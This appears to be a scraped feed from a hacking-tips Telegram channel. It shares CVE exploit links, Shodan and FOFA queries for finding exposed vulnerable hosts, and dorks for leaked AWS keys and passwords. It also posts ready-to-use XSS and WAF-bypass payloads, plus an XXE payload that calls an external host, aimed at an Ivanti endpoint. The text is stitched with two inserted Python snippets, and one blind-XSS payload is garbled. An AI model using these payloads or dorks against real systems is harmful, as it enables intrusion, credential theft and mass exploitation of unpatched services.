CyberSec Playground | Learn ethical hacking ⚡️
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
⚠️ CVE-2024-53677
File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.

LINK 👇
https://github.com/0xPThree/struts_cve-2024-53677
➡️ Admin-Panel-Dorks
Find The Admin Panel & SQL Injection Endpoints, Using Google Dorks !!!

https://github.com/0Xnanoboy/Admin-Panel-Dorks

#fuzzing #payload #infosec
❤‍🔥1
⚠️ CVE-2024-50603 (CVSS 10)

Critical Command Injection Vulnerability in Aviatrix Controller

🔥PoC : github.com

📊 10K+ Services are found on hunter.how yearly.


👇Query
HUNTER :product.name="Aviatrix Controller"

FOFA : product="aVIaTrIX-Controller"
SHODAN : title="Aviatrix Controller"

📰Refer:securityonline.info/cve-2024-50603


#hunterhow #infosec #infosecurity #OSINT #Vulnerability
1👍1
🟣 Understanding Linux System Logs

System logs, often found in the /var/log directory on Linux systems, are essential for monitoring and troubleshooting system issues. Here are short notes on some common system logs:

syslog: A general-purpose system log file that contains messages from various system services and applications. It's the main log file that many other logs feed into.

auth.log: Records authentication-related messages, including successful and failed login attempts, password changes, and user authentication events.

kern.log: Logs kernel-related messages, such as hardware errors, kernel module loading, and other kernel activities.

messages: A catch-all log file that records various system messages, including system startups, shutdowns, and general system-related events.

dmesg: Displays kernel ring buffer messages, providing a real-time view of kernel-related events and hardware detection during system boot-up.

cron: Logs messages related to cron jobs and scheduled tasks, including when they run, and any errors encountered during execution.

secure: Records security-related messages, including authentication attempts, privilege escalation, and other security-related events.

apache/access.log and apache/error.log: These logs are specific to the Apache web server. access.log records HTTP access logs, while error.log logs Apache server errors and warnings.

nginx/access.log and nginx/error.log: Similar to Apache logs, these logs are specific to the Nginx web server and record access and error events.

mysql/error.log: Records errors and warnings encountered by the MySQL database server, including startup errors, query failures, and database crashes.

These logs provide valuable insights into system performance, security events, and troubleshooting information. Regularly monitoring and analyzing these logs can help maintain system health and identify potential issues before they escalate.

#infosec #learning #linux
2👌1
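An added example (not part of the original post) of the kind of review auth.log supports: it counts failed sshd logins per source IP and flags a login that is accepted after repeated failures. The sample lines are constructed and assume the common sshd message layout; `summarize` and the threshold of 3 are hypothetical choices.

```python
import re
from collections import defaultdict

# Constructed sample lines in the usual sshd/auth.log layout (not real data).
SAMPLE_AUTH_LOG = """\
Jan 12 03:14:01 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 50122 ssh2
Jan 12 03:14:03 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 50124 ssh2
Jan 12 03:14:06 web01 sshd[2213]: Failed password for deploy from 203.0.113.7 port 50130 ssh2
Jan 12 03:14:09 web01 sshd[2215]: Accepted password for deploy from 203.0.113.7 port 50140 ssh2
Jan 12 08:30:44 web01 sshd[3050]: Failed password for alice from 198.51.100.20 port 40110 ssh2
Jan 12 08:30:51 web01 sshd[3050]: Accepted publickey for alice from 198.51.100.20 port 40110 ssh2
Jan 12 09:00:01 web01 CRON[3100]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# Matches both "Failed <method> for [invalid user] <user> from <ip>" and
# "Accepted <method> for <user> from <ip>" as written by sshd.
SSHD_EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def summarize(log_text, threshold=3):
    """Return (failures per IP, logins accepted after >= threshold failures)."""
    failures = defaultdict(int)
    suspicious = []  # (ip, user) pairs worth a manual look
    for line in log_text.splitlines():
        m = SSHD_EVENT.search(line)
        if not m:
            continue  # lines from other services (cron, sudo, ...) are skipped
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip] += 1
        elif failures.get(ip, 0) >= threshold:
            suspicious.append((ip, m["user"]))
    return dict(failures), suspicious

if __name__ == "__main__":
    fails, hits = summarize(SAMPLE_AUTH_LOG)
    for ip, count in fails.items():
        print(f"{ip}: {count} failed logins")
    for ip, user in hits:
        print(f"REVIEW: {user} logged in from {ip} after repeated failures")
```
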
CLOUDFLARE BYPASS [XSS] PAYLOAD: ⚔️

Add to your custom list

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

#infosec #cybersec #bugbountytips
1👍1
SpideyX - A web reconnaissance penetration testing tool for penetration testers and ethical hackers that includes multiple modes with asynchronous concurrent performance. SpideyX has 3 separate modes, each used for a different approach and different methods. SpideyX is one tool but it equals 3 tools because it is capable of crawling, JS scraping, and parameter fuzzing.

https://github.com/RevoltSecurities/Spideyx
#tools #cybersec #bugbountytips
2👏2
⚡️ Poc CVE-2025-0282
Ivanti Connect Secure zero-day


Hunter :
product.name="Ivanti Connect Secure"||product.name="Ivanti Policy Secure"||product.name="Ivanti Neurons for ZTA"



⬇️ Link:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

#poc #cve #infosec
🔥4
AungRecon


AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.



Features:
WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.



Link:
https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file



Installation:
Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh

Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh
👏2👍1
Injectra: Payload Injection via File Magic Numbers

Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.



Features
- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.

- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.

- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.

- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.

- Dependency Management: Automatically checks and installs required Python packages.

https://github.com/AnonKryptiQuz/Injectra

#tools #payload #injection
👍3
Finding the real IP behind Cloudflare has never been so easy. Here is a tool to search on Shodan starting from a simple favicon

- https://github.com/pielco11/fav-up

#infosec #cybersec #bugbountytips
2👍1
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:

Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params

- https://github.com/In3tinct/See-SURF

A Python-based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.




#SSRF #cybersec #lfi
👏2❤‍🔥1👍1
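An added example (not part of the original post) that runs the regex above over constructed request lines from an application's own traffic log, then names the individual parameters whose values look like a path, URL or filename so each can be given input validation. `risky_params`, `VALUE_SHAPE` and the sample requests are hypothetical.

```python
import re

# The search pattern from the post, unchanged.
PATTERN = re.compile(
    r"\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])"
)
# Only the value part of the pattern, for checking one parameter at a time.
VALUE_SHAPE = re.compile(
    r"(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])"
)

# Constructed request lines, as they would appear in proxy history or a log.
SAMPLE_REQUESTS = [
    "GET /download?file=/etc/app/report.txt HTTP/1.1",
    "GET /fetch?url=https%3A%2F%2Fcdn.example.test%2Fa.png HTTP/1.1",
    "GET /login?next=//example.test/home HTTP/1.1",
    "GET /view?doc=invoice.pdf HTTP/1.1",
    "GET /search?q=laptop&page=2 HTTP/1.1",
    "GET /static/site.css HTTP/1.1",
]

def flagged(requests):
    """Request lines the whole pattern matches (what a log search would show)."""
    return [r for r in requests if PATTERN.search(r)]

def risky_params(request_line):
    """Return (path, [parameter names]) whose values match the value shapes."""
    target = request_line.split(" ")[1]
    path, _, query = target.partition("?")
    names = []
    for pair in query.split("&"):
        name, sep, value = pair.partition("=")
        # The filename alternative needs one trailing non-word character;
        # "&" stands in for the delimiter that follows the value on the wire.
        if sep and VALUE_SHAPE.match(value + "&"):
            names.append(name)
    return path, names

if __name__ == "__main__":
    for line in flagged(SAMPLE_REQUESTS):
        print(risky_params(line))
    # Caveat: on a bare URL with nothing after the filename, the pattern misses.
    print(PATTERN.search("/view?doc=invoice.pdf"))
```

The last line shows a blind spot: the filename alternative ends in `[^\w]`, so a value at the very end of the searched text is not matched unless something (a space, `&`, a newline) follows it.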
CVE-2024-22024, XXE on Ivanti Connect Secure

Payload, encode it to base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

Send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest

#bugbountytips #cve #infosec
👍3
⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform

📊 3.2K+ Services are found on hunter.how yearly.

🔗Hunter Link:hunter.how/list?searchVal…

👇Query
HUNTER :product.name="SAP NetWeaver AS for ABAP"

Refer:securityonline.info/critical-sap-f…

#hunterhow #infosec #infosecurity #OSINT #Vulnerability
🔥2👍1👌1
⚠️ Alert

CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces


🔗Hunter Link:hunter.how/list?searchVal…

👇Query

HUNTER :product.name="Fortinet Firewall"

FOFA : product="FORTINET-Firewall"

📰Refer:securityonline.info/active-exploit…

#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday
2👌1
Blind XSS in Private crypto target
Payload used

"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">

#bugbountytips #bugbounty #payload
🔥3
Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-'

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips
3
🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty
4
Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip
🔥3
⚡️ XSS Payload

Payload:
1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 



#bugbountytips #xss #bugbounty #infosecc #cybersec
👏3